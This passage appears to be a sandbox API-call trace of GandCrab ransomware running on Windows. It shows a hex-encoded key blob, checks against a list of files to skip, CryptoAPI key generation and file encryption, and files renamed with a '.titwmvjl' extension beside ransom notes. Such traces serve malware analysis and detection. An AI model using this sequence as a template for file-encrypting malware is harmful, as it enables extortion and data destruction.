x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.171] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0096.172] CloseHandle (hObject=0x2c4) returned 1 [0096.172] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.173] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.173] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0x1e8)) [0096.173] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.173] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.173] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.173] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\d2ca4a09d2ca4deb61a.lock") returned 89 [0096.173] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\gadgets\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0096.174] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.174] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.174] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\") returned 65 [0096.174] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*" [0096.175] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x5033b8 [0096.175] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.175] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0096.176] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.176] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.176] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0096.176] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0096.176] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0096.176] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\d2ca4a09d2ca4deb61a.lock" [0096.176] lstrlenW (lpString=".titwmvjl") returned 9 [0096.176] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\d2ca4a09d2ca4deb61a.lock") returned 89 [0096.176] VirtualAlloc (lpAddress=0x0, dwSize=0xf2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.176] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 98 [0096.176] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\d2ca4a09d2ca4deb61a.lock") returned 89 [0096.176] lstrlenW (lpString=".lock") returned 5 [0096.176] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.177] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0096.177] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.177] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.177] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0096.177] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0096.177] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0096.177] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\TITWMVJL-DECRYPT.txt" [0096.177] lstrlenW (lpString=".titwmvjl") returned 9 [0096.177] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\TITWMVJL-DECRYPT.txt") returned 85 [0096.177] VirtualAlloc (lpAddress=0x0, dwSize=0xea, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.178] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 94 [0096.178] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\TITWMVJL-DECRYPT.txt") returned 85 [0096.178] lstrlenW (lpString=".txt") returned 4 [0096.178] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.178] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0096.178] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0096.178] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.179] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\TITWMVJL-DECRYPT.txt") returned 85 [0096.179] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\TITWMVJL-DECRYPT.txt") returned 85 [0096.179] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0096.179] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0096.179] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0096.179] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0096.179] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0096.179] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0096.179] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0096.179] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0096.179] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.179] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0096.179] FindClose (in: hFindFile=0x5033b8 | out: hFindFile=0x5033b8) returned 1 [0096.180] CloseHandle (hObject=0x2c4) returned 1 [0096.180] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0096.180] lstrcmpW (lpString1="settings.ini", lpString2=".") returned 1 [0096.180] lstrcmpW (lpString1="settings.ini", lpString2="..") returned 1 [0096.180] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\", lpString2="settings.ini" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\settings.ini") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\settings.ini" [0096.180] lstrlenW (lpString=".titwmvjl") returned 9 [0096.180] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\settings.ini") returned 69 [0096.181] VirtualAlloc (lpAddress=0x0, dwSize=0xca, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.181] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\settings.ini.titwmvjl") returned 78 [0096.181] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\settings.ini") returned 69 [0096.181] lstrlenW (lpString=".ini") returned 4 [0096.181] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.181] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0096.181] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0096.181] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.181] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\settings.ini") returned 69 [0096.181] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\settings.ini") returned 69 [0096.181] lstrcmpiW (lpString1="settings.ini", lpString2="desktop.ini") returned 1 [0096.181] lstrcmpiW (lpString1="settings.ini", lpString2="autorun.inf") returned 1 [0096.181] lstrcmpiW (lpString1="settings.ini", lpString2="ntuser.dat") returned 1 [0096.182] lstrcmpiW (lpString1="settings.ini", lpString2="iconcache.db") returned 1 [0096.182] lstrcmpiW (lpString1="settings.ini", lpString2="bootsect.bak") returned 1 [0096.182] lstrcmpiW (lpString1="settings.ini", lpString2="boot.ini") returned 1 [0096.182] lstrcmpiW (lpString1="settings.ini", lpString2="ntuser.dat.log") returned 1 [0096.182] lstrcmpiW (lpString1="settings.ini", lpString2="thumbs.db") returned -1 [0096.182] lstrcmpiW (lpString1="settings.ini", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0096.182] lstrcmpiW (lpString1="settings.ini", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0096.182] lstrcmpiW (lpString1="settings.ini", lpString2="KRAB-DECRYPT.html") returned 1 [0096.182] lstrcmpiW (lpString1="settings.ini", lpString2="CRAB-DECRYPT.html") returned 1 [0096.182] lstrcmpiW (lpString1="settings.ini", lpString2="KRAB-DECRYPT.txt") returned 1 [0096.182] lstrcmpiW (lpString1="settings.ini", lpString2="CRAB-DECRYPT.txt") returned 1 [0096.182] lstrcmpiW (lpString1="settings.ini", lpString2="ntldr") returned 1 [0096.182] lstrcmpiW (lpString1="settings.ini", lpString2="NTDETECT.COM") returned 1 [0096.182] lstrcmpiW (lpString1="settings.ini", lpString2="Bootfont.bin") returned 1 [0096.182] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\settings.ini") returned 69 [0096.182] lstrlenW (lpString=".ini") returned 4 [0096.182] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.183] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".ini ") returned 5 [0096.183] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.183] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.183] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\settings.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\settings.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0096.184] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0096.184] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.185] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0096.185] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0096.185] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0096.186] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0096.186] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0096.186] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.186] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.186] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.186] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.186] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0096.187] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0096.187] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0096.187] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0096.187] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0096.187] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.188] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.188] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.188] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.188] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0096.189] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.189] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5035b8) returned 1 [0096.189] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.189] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0096.189] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.189] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0096.190] GetLastError () returned 0x0 [0096.190] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.190] CryptDestroyKey (hKey=0x5035b8) returned 1 [0096.190] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.190] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.190] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.190] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0096.191] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.191] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5033f8) returned 1 [0096.191] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.191] CryptGetKeyParam (in: hKey=0x5033f8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0096.191] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.192] CryptEncrypt (in: hKey=0x5033f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0096.192] GetLastError () returned 0x0 [0096.192] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.192] CryptDestroyKey (hKey=0x5033f8) returned 1 [0096.192] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.192] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.192] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0096.193] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0096.193] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0x50, lpOverlapped=0x0) returned 1 [0096.205] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xffffffb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.205] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0x50, lpOverlapped=0x0) returned 1 [0096.216] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.216] WriteFile (in: hFile=0x2c4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0096.219] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.223] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.223] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.223] CloseHandle (hObject=0x2c4) returned 1 [0096.224] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\settings.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\settings.ini"), lpNewFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\settings.ini.titwmvjl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\settings.ini.titwmvjl"), dwFlags=0x1) returned 1 [0096.224] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.225] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0096.225] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0096.225] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0096.225] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows 